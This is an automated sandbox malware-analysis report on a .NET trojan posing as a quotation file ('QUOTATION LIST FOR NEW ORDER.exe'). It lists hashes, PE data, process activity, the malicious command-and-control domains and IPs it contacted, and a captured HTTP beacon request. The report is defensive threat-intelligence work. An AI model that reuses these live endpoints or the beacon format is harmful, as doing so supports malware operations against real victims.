                                            http://www.fontbureau.comdQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.253137868.00000000059D2000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fontbureau.comessed3QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.253917297.00000000059D2000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.carterandcone.comlexplorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpfalse
                                              		high
                                              http://www.founder.com.cn/cnexplorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.fontbureau.com/designers/frere-jones.htmlQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.253893243.00000000059CC000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpfalse
                                                		high
                                                http://www.jiyu-kobo.co.jp/sQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.250297719.00000000059D2000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.jiyu-kobo.co.jp/rQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.250297719.00000000059D2000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.fontbureau.comcomFQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.254519056.00000000059D2000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.jiyu-kobo.co.jp/jp/(QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.250650789.00000000059D2000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.jiyu-kobo.co.jp/QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.250650789.00000000059D2000.00000004.00000001.sdmp, QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.248847065.00000000059D2000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.fontbureau.comoQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.261741820.00000000059D2000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.fontbureau.com/designers8explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpfalse
                                                  		high
                                                  http://www.fontbureau.comalsQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.255438854.00000000059D2000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.urwpp.dejQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.255181502.00000000059FA000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.fontbureau.com/designers:QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.253270152.00000000059F1000.00000004.00000001.sdmp, QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.254053171.00000000059F1000.00000004.00000001.sdmpfalse
                                                    		high
                                                    http://www.fontbureau.com/designers/QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.252461683.00000000059D2000.00000004.00000001.sdmp, QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.252430930.00000000059F1000.00000004.00000001.sdmpfalse
                                                      		high
                                                      http://www.galapagosdesign.com/(QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.256992965.00000000059D2000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown

                                                      Contacted IPs

                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs

                                                      Public

                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      204.11.58.233
                                                      		everesttechsolutions.comUnited States
                                                      		394695PUBLIC-DOMAIN-REGISTRYUStrue
                                                      47.222.2.124
                                                      		www.quotovate.comUnited States
                                                      		19108SUDDENLINK-COMMUNICATIONSUStrue

                                                      General Information

                                                      Joe Sandbox Version:33.0.0 White Diamond
                                                      Analysis ID:458798
                                                      Start date:03.08.2021
                                                      Start time:18:53:26
                                                      Joe Sandbox Product:CloudBasic
                                                      Overall analysis duration:0h 11m 23s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Sample file name:QUOTATION LIST FOR NEW ORDER.exe
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                      Number of analysed new started processes analysed:16
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • HDC enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Detection:MAL
                                                      Classification:mal100.troj.evad.winEXE@9/1@5/2
                                                      EGA Information:Failed
                                                      HDC Information:
                                                      • Successful, ratio: 58.7% (good quality ratio 52%)
                                                      • Quality average: 69.8%
                                                      • Quality standard deviation: 33.1%
                                                      HCA Information:
                                                      • Successful, ratio: 100%
                                                      • Number of executed functions: 53
                                                      • Number of non-executed functions: 131
                                                      Cookbook Comments:
                                                      • Adjust boot time
                                                      • Enable AMSI
                                                      • Found application associated with file extension: .exe
                                                      Warnings:
                                                      Show All
                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                      • Excluded IPs from analysis (whitelisted): 13.88.21.125, 104.43.193.48, 23.211.4.86
                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, blobcollector.events.data.trafficmanager.net, e1723.g.akamaiedge.net, watson.telemetry.microsoft.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, skypedataprdcolwus15.cloudapp.net, skypedataprdcolcus15.cloudapp.net
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                                      Simulations

                                                      Behavior and APIs

                                                      TimeTypeDescription
                                                      18:54:49API Interceptor1x Sleep call for process: QUOTATION LIST FOR NEW ORDER.exe modified

                                                      Joe Sandbox View / Context

                                                      IPs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                      204.11.58.233Invoice #210722 14,890 $.exeGet hashmaliciousBrowse
                                                      • www.everesttechsolutions.com/p4se/?Xl=8ptXsvhhshn&j8kTd=aCSsC2Wtvj0xQ8J4lkVrtXAo/y9YES1uuye3QtaBHWEeyHJ7dSrXHfQKVnZFxvELJI1b

                                                      Domains

                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext

                                                      ASN

                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                      PUBLIC-DOMAIN-REGISTRYUSMJLkaPZomUolseU.exeGet hashmaliciousBrowse
                                                      • 208.91.199.225
                                                      SecuriteInfo.com.Trojan.MSIL.Kryptik.56a80396.11710.exeGet hashmaliciousBrowse
                                                      • 208.91.199.224
                                                      Invoice.exeGet hashmaliciousBrowse
                                                      • 208.91.198.143
                                                      Scan#0068-46c3367.exeGet hashmaliciousBrowse
                                                      • 208.91.199.224
                                                      Scan#0068-46c3366.exeGet hashmaliciousBrowse
                                                      • 208.91.199.223
                                                      bin.exeGet hashmaliciousBrowse
                                                      • 119.18.54.122
                                                      IMG-20210802-WA0587-085.exeGet hashmaliciousBrowse
                                                      • 208.91.199.224
                                                      IMG-20210802-WA0587-087.exeGet hashmaliciousBrowse
                                                      • 208.91.198.143
                                                      Quotation.exeGet hashmaliciousBrowse
                                                      • 208.91.199.224
                                                      QUOTE 04202021.exeGet hashmaliciousBrowse
                                                      • 103.21.58.16
                                                      PURCHASE ORDER PO09377 _093640_9307355_264378_88479_0E974.exeGet hashmaliciousBrowse
                                                      • 208.91.199.225
                                                      order.PDF.exeGet hashmaliciousBrowse
                                                      • 208.91.199.223
                                                      RFQ #7696679TTR6F.exeGet hashmaliciousBrowse
                                                      • 208.91.199.224
                                                      Waybill Doc_027942941.exeGet hashmaliciousBrowse
                                                      • 208.91.199.225
                                                      Confirmaci#U00f3n de pago .exeGet hashmaliciousBrowse
                                                      • 208.91.199.224
                                                      triage_dropped_file.exeGet hashmaliciousBrowse
                                                      • 162.222.226.11
                                                      oBNvb4c6bg.exeGet hashmaliciousBrowse
                                                      • 208.91.199.224
                                                      TVz86np48Z.exeGet hashmaliciousBrowse
                                                      • 208.91.199.223
                                                      Current Vendor Payment Application .docGet hashmaliciousBrowse
                                                      • 208.91.199.224
                                                      XiAn Sunnstatement 27-07-2021 pdf.exeGet hashmaliciousBrowse
                                                      • 208.91.199.223
                                                      SUDDENLINK-COMMUNICATIONSUSAEOjFHGJArGet hashmaliciousBrowse
                                                      • 74.224.157.19
                                                      uMWZeUs5ZUGet hashmaliciousBrowse
                                                      • 47.214.175.5
                                                      LnjgWbwSinGet hashmaliciousBrowse
                                                      • 47.208.203.76
                                                      8Z9DxqJIfNGet hashmaliciousBrowse
                                                      • 74.193.211.111
                                                      vw23PmQlqGGet hashmaliciousBrowse
                                                      • 173.217.185.2
                                                      psqZnqCtZLGet hashmaliciousBrowse
                                                      • 74.225.176.64
                                                      SecuriteInfo.com.Linux.Mirai.27.23761.13200Get hashmaliciousBrowse
                                                      • 74.225.189.162
                                                      Lv08gOEYJ3Get hashmaliciousBrowse
                                                      • 47.208.116.165
                                                      oqG1fmow77Get hashmaliciousBrowse
                                                      • 173.80.22.233
                                                      4dIxGwjniIGet hashmaliciousBrowse
                                                      • 75.108.75.218
                                                      i01hLg63evGet hashmaliciousBrowse
                                                      • 47.215.216.37
                                                      DLGXmh48NDGet hashmaliciousBrowse
                                                      • 74.242.201.236
                                                      Lkm548STLfGet hashmaliciousBrowse
                                                      • 75.108.170.66
                                                      6sag2zM690Get hashmaliciousBrowse
                                                      • 173.216.231.112
                                                      MJ5yMxtK4YGet hashmaliciousBrowse
                                                      • 192.101.60.106
                                                      EM7kj9300xGet hashmaliciousBrowse
                                                      • 173.80.22.224
                                                      lLc1G9C259Get hashmaliciousBrowse
                                                      • 47.216.131.198
                                                      Jp0fvo75qaGet hashmaliciousBrowse
                                                      • 47.209.25.147
                                                      7spunOMzSKGet hashmaliciousBrowse
                                                      • 47.218.42.237
                                                      F2PYGjcpEUGet hashmaliciousBrowse
                                                      • 74.224.134.234

                                                      JA3 Fingerprints

                                                      No context

                                                      Dropped Files

                                                      No context

                                                      Created / dropped Files

                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\QUOTATION LIST FOR NEW ORDER.exe.log
                                                      Process:C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):1314
                                                      Entropy (8bit):5.350128552078965
                                                      Encrypted:false
                                                      SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                                      MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                                                      SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                                      SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                                      SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                                      Malicious:true
                                                      Reputation:high, very likely benign file
                                                      Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                      Static File Info

                                                      General

                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Entropy (8bit):7.773783545447779
                                                      TrID:
                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                      • Win32 Executable (generic) a (10002005/4) 49.75%
                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                      • Windows Screen Saver (13104/52) 0.07%
                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                      File name:QUOTATION LIST FOR NEW ORDER.exe
                                                      File size:1347072
                                                      MD5:2a28a3e032a65c25b90f193621b623af
                                                      SHA1:019659bb43b5535a9684d9938aa73e98682b0a61
                                                      SHA256:317613289fb0cce8c301f63922883b30d54bbcdf1cb01bfa772244e03a07dfda
                                                      SHA512:c6aa00f5777d5e0d2f687aaaae1ac8bb9b1689729688088fcde0707c060b8e96b46a133b47d586cb852b277f64b8ce9fd68578d9c25c7f6b702023534494646d
                                                      SSDEEP:24576:wogS/d3ZYdke1b0AIM2Jga9lY7uEmJmwRGPoN7vdiTbnFM:YdvXl9jim/PoiM
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..a..............P.................. ........@.. ....................................@................................

                                                      File Icon

                                                      Icon Hash:00828e8e8686b000

                                                      Static PE Info

                                                      General

                                                      Entrypoint:0x54a0de
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                      Time Stamp:0x6103A829 [Fri Jul 30 07:20:09 2021 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:v4.0.30319
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                      Entrypoint Preview

                                                      Instruction
                                                      jmp dword ptr [00402000h]

                                                      Data Directories

                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x14a08c0x4f.text
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x14c0000x5c8.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x14e0000xc.reloc
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                      Sections

                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      .text0x20000x1483440x148400False0.862922011853data7.77803780051IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                      .rsrc0x14c0000x5c80x600False0.440104166667data4.16475165345IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .reloc0x14e0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                      Resources

                                                      NameRVASizeTypeLanguageCountry
                                                      RT_VERSION0x14c0900x338data
                                                      RT_MANIFEST0x14c3d80x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                      Imports

                                                      DLLImport
                                                      mscoree.dll_CorExeMain

                                                      Version Infos

                                                      DescriptionData
                                                      Translation0x0000 0x04b0
                                                      LegalCopyrightTeamViewer 2021 (C)
                                                      Assembly Version4.2.2.0
                                                      InternalNameTup.exe
                                                      FileVersion4.3.0.6
                                                      CompanyNameTeamViewer GmBh
                                                      LegalTrademarks
                                                      Comments
                                                      ProductNameGame Picture
                                                      ProductVersion4.3.0.6
                                                      FileDescriptionGame Picture
                                                      OriginalFilenameTup.exe

                                                      Network Behavior

                                                      Snort IDS Alerts

                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                      08/03/21-18:56:13.121292ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.78.8.8.8
                                                      08/03/21-18:56:14.482122ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.78.8.8.8

                                                      Network Port Distribution

                                                      TCP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Aug 3, 2021 18:56:03.276704073 CEST4970480192.168.2.7204.11.58.233
                                                      Aug 3, 2021 18:56:03.426737070 CEST8049704204.11.58.233192.168.2.7
                                                      Aug 3, 2021 18:56:03.426877022 CEST4970480192.168.2.7204.11.58.233
                                                      Aug 3, 2021 18:56:03.427073956 CEST4970480192.168.2.7204.11.58.233
                                                      Aug 3, 2021 18:56:03.577406883 CEST8049704204.11.58.233192.168.2.7
                                                      Aug 3, 2021 18:56:03.918870926 CEST4970480192.168.2.7204.11.58.233
                                                      Aug 3, 2021 18:56:04.099133015 CEST8049704204.11.58.233192.168.2.7
                                                      Aug 3, 2021 18:56:06.000478029 CEST8049704204.11.58.233192.168.2.7
                                                      Aug 3, 2021 18:56:06.000588894 CEST4970480192.168.2.7204.11.58.233
                                                      Aug 3, 2021 18:56:06.001934052 CEST8049704204.11.58.233192.168.2.7
                                                      Aug 3, 2021 18:56:06.002037048 CEST4970480192.168.2.7204.11.58.233
                                                      Aug 3, 2021 18:56:17.167814970 CEST4970580192.168.2.747.222.2.124
                                                      Aug 3, 2021 18:56:20.169933081 CEST4970580192.168.2.747.222.2.124
                                                      Aug 3, 2021 18:56:26.170384884 CEST4970580192.168.2.747.222.2.124

                                                      UDP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Aug 3, 2021 18:54:13.497689009 CEST6335453192.168.2.78.8.8.8
                                                      Aug 3, 2021 18:54:13.523097038 CEST53633548.8.8.8192.168.2.7
                                                      Aug 3, 2021 18:54:14.489391088 CEST5312953192.168.2.78.8.8.8
                                                      Aug 3, 2021 18:54:14.517411947 CEST53531298.8.8.8192.168.2.7
                                                      Aug 3, 2021 18:54:15.328059912 CEST6245253192.168.2.78.8.8.8
                                                      Aug 3, 2021 18:54:15.353789091 CEST53624528.8.8.8192.168.2.7
                                                      Aug 3, 2021 18:54:16.167668104 CEST5782053192.168.2.78.8.8.8
                                                      Aug 3, 2021 18:54:16.193391085 CEST53578208.8.8.8192.168.2.7
                                                      Aug 3, 2021 18:54:17.116626024 CEST5084853192.168.2.78.8.8.8
                                                      Aug 3, 2021 18:54:17.141563892 CEST53508488.8.8.8192.168.2.7
                                                      Aug 3, 2021 18:54:18.160233021 CEST6124253192.168.2.78.8.8.8
                                                      Aug 3, 2021 18:54:18.193016052 CEST53612428.8.8.8192.168.2.7
                                                      Aug 3, 2021 18:54:19.019804955 CEST5856253192.168.2.78.8.8.8
                                                      Aug 3, 2021 18:54:19.047405958 CEST53585628.8.8.8192.168.2.7
                                                      Aug 3, 2021 18:54:21.165599108 CEST5659053192.168.2.78.8.8.8
                                                      Aug 3, 2021 18:54:21.194493055 CEST53565908.8.8.8192.168.2.7
                                                      Aug 3, 2021 18:54:22.194313049 CEST6050153192.168.2.78.8.8.8
                                                      Aug 3, 2021 18:54:22.363729954 CEST53605018.8.8.8192.168.2.7
                                                      Aug 3, 2021 18:54:23.168865919 CEST5377553192.168.2.78.8.8.8
                                                      Aug 3, 2021 18:54:23.197211027 CEST53537758.8.8.8192.168.2.7
                                                      Aug 3, 2021 18:54:24.453998089 CEST5183753192.168.2.78.8.8.8
                                                      Aug 3, 2021 18:54:24.486718893 CEST53518378.8.8.8192.168.2.7
                                                      Aug 3, 2021 18:54:25.805160046 CEST5541153192.168.2.78.8.8.8
                                                      Aug 3, 2021 18:54:25.833256960 CEST53554118.8.8.8192.168.2.7
                                                      Aug 3, 2021 18:54:28.530322075 CEST6366853192.168.2.78.8.8.8
                                                      Aug 3, 2021 18:54:28.555107117 CEST53636688.8.8.8192.168.2.7
                                                      Aug 3, 2021 18:54:29.475338936 CEST5464053192.168.2.78.8.8.8
                                                      Aug 3, 2021 18:54:29.507994890 CEST53546408.8.8.8192.168.2.7
                                                      Aug 3, 2021 18:54:30.312120914 CEST5873953192.168.2.78.8.8.8
                                                      Aug 3, 2021 18:54:30.340039968 CEST53587398.8.8.8192.168.2.7
                                                      Aug 3, 2021 18:54:31.420591116 CEST6033853192.168.2.78.8.8.8
                                                      Aug 3, 2021 18:54:31.455758095 CEST53603388.8.8.8192.168.2.7
                                                      Aug 3, 2021 18:54:32.760993958 CEST5871753192.168.2.78.8.8.8
                                                      Aug 3, 2021 18:54:32.785573006 CEST53587178.8.8.8192.168.2.7
                                                      Aug 3, 2021 18:54:33.714972019 CEST5976253192.168.2.78.8.8.8
                                                      Aug 3, 2021 18:54:33.749150038 CEST53597628.8.8.8192.168.2.7
                                                      Aug 3, 2021 18:56:03.089462996 CEST5432953192.168.2.78.8.8.8
                                                      Aug 3, 2021 18:56:03.265300035 CEST53543298.8.8.8192.168.2.7
                                                      Aug 3, 2021 18:56:08.939980984 CEST5805253192.168.2.78.8.8.8
                                                      Aug 3, 2021 18:56:09.950802088 CEST5805253192.168.2.78.8.8.8
                                                      Aug 3, 2021 18:56:11.309310913 CEST5805253192.168.2.78.8.8.8
                                                      Aug 3, 2021 18:56:12.105026007 CEST53580528.8.8.8192.168.2.7
                                                      Aug 3, 2021 18:56:13.117250919 CEST53580528.8.8.8192.168.2.7
                                                      Aug 3, 2021 18:56:14.478785992 CEST53580528.8.8.8192.168.2.7
                                                      Aug 3, 2021 18:56:17.127902985 CEST5400853192.168.2.78.8.8.8
                                                      Aug 3, 2021 18:56:17.165973902 CEST53540088.8.8.8192.168.2.7

                                                      ICMP Packets

                                                      TimestampSource IPDest IPChecksumCodeType
                                                      Aug 3, 2021 18:56:13.121292114 CEST192.168.2.78.8.8.8cff5(Port unreachable)Destination Unreachable
                                                      Aug 3, 2021 18:56:14.482121944 CEST192.168.2.78.8.8.8cff5(Port unreachable)Destination Unreachable

                                                      DNS Queries

                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                      Aug 3, 2021 18:56:03.089462996 CEST192.168.2.78.8.8.80x45f3Standard query (0)www.everesttechsolutions.comA (IP address)IN (0x0001)
                                                      Aug 3, 2021 18:56:08.939980984 CEST192.168.2.78.8.8.80xa17fStandard query (0)www.tomio.techA (IP address)IN (0x0001)
                                                      Aug 3, 2021 18:56:09.950802088 CEST192.168.2.78.8.8.80xa17fStandard query (0)www.tomio.techA (IP address)IN (0x0001)
                                                      Aug 3, 2021 18:56:11.309310913 CEST192.168.2.78.8.8.80xa17fStandard query (0)www.tomio.techA (IP address)IN (0x0001)
                                                      Aug 3, 2021 18:56:17.127902985 CEST192.168.2.78.8.8.80x872cStandard query (0)www.quotovate.comA (IP address)IN (0x0001)

                                                      DNS Answers

                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                      Aug 3, 2021 18:56:03.265300035 CEST8.8.8.8192.168.2.70x45f3No error (0)www.everesttechsolutions.comeveresttechsolutions.comCNAME (Canonical name)IN (0x0001)
                                                      Aug 3, 2021 18:56:03.265300035 CEST8.8.8.8192.168.2.70x45f3No error (0)everesttechsolutions.com204.11.58.233A (IP address)IN (0x0001)
                                                      Aug 3, 2021 18:56:12.105026007 CEST8.8.8.8192.168.2.70xa17fServer failure (2)www.tomio.technonenoneA (IP address)IN (0x0001)
                                                      Aug 3, 2021 18:56:13.117250919 CEST8.8.8.8192.168.2.70xa17fServer failure (2)www.tomio.technonenoneA (IP address)IN (0x0001)
                                                      Aug 3, 2021 18:56:14.478785992 CEST8.8.8.8192.168.2.70xa17fServer failure (2)www.tomio.technonenoneA (IP address)IN (0x0001)
                                                      Aug 3, 2021 18:56:17.165973902 CEST8.8.8.8192.168.2.70x872cNo error (0)www.quotovate.com47.222.2.124A (IP address)IN (0x0001)

                                                      HTTP Request Dependency Graph

                                                      • www.everesttechsolutions.com

                                                      HTTP Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      0192.168.2.749704204.11.58.23380C:\Windows\explorer.exe
                                                      TimestampkBytes transferredDirectionData
                                                      Aug 3, 2021 18:56:03.427073956 CEST405OUTGET /p4se/?RFQLn6=2dFdaDmhFhA0QZgP&-Zmt_=aCSsC2Wtvj0xQ8J4lkVrtXAo/y9YES1uuye3QtaBHWEeyHJ7dSrXHfQKVk1syv4zArANdeJ+Lg== HTTP/1.1
                                                      Host: www.everesttechsolutions.com
                                                      Connection: close
                                                      Data Raw: 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      Aug 3, 2021 18:56:06.000478029 CEST407INHTTP/1.1 301 Moved Permanently
                                                      Date: Tue, 03 Aug 2021 16:56:03 GMT
                                                      Server: Apache
                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                      Pragma: no-cache
                                                      X-Redirect-By: WordPress
                                                      Set-Cookie: PHPSESSID=f818a483df7096bf3685fb921c9165a5; path=/
                                                      Upgrade: h2,h2c
                                                      Connection: Upgrade, close
                                                      Location: https://everesttechsolutions.com/p4se/?RFQLn6=2dFdaDmhFhA0QZgP&-Zmt_=aCSsC2Wtvj0xQ8J4lkVrtXAo/y9YES1uuye3QtaBHWEeyHJ7dSrXHfQKVk1syv4zArANdeJ+Lg==
                                                      Referrer-Policy: no-referrer-when-downgrade
                                                      Content-Length: 0
                                                      Content-Type: text/html; charset=UTF-8


                                                      Code Manipulations

                                                      Statistics

                                                      CPU Usage

                                                      Click to jump to process

                                                      Memory Usage

                                                      Click to jump to process

                                                      High Level Behavior Distribution

                                                      Click to dive into process behavior distribution

                                                      Behavior

                                                      Click to jump to process

                                                      System Behavior

                                                      Analysis Process: QUOTATION LIST FOR NEW ORDER.exe PID: 5532 Parent PID: 5588

                                                      General

                                                      Start time:18:54:22
                                                      Start date:03/08/2021
                                                      Path:C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:'C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe'
                                                      Imagebase:0x580000
                                                      File size:1347072 bytes
                                                      MD5 hash:2A28A3E032A65C25B90F193621B623AF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Reputation:low

                                                      Chronological Activities

                                                      Analysis Process: QUOTATION LIST FOR NEW ORDER.exe PID: 4768 Parent PID: 5532

                                                      General

                                                      Start time:18:54:50
                                                      Start date:03/08/2021
                                                      Path:C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe
                                                      Imagebase:0x90000
                                                      File size:1347072 bytes
                                                      MD5 hash:2A28A3E032A65C25B90F193621B623AF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low

                                                      Chronological Activities

                                                      Analysis Process: QUOTATION LIST FOR NEW ORDER.exe PID: 4760 Parent PID: 5532

                                                      General

                                                      Start time:18:54:51
                                                      Start date:03/08/2021
                                                      Path:C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe
                                                      Imagebase:0x590000
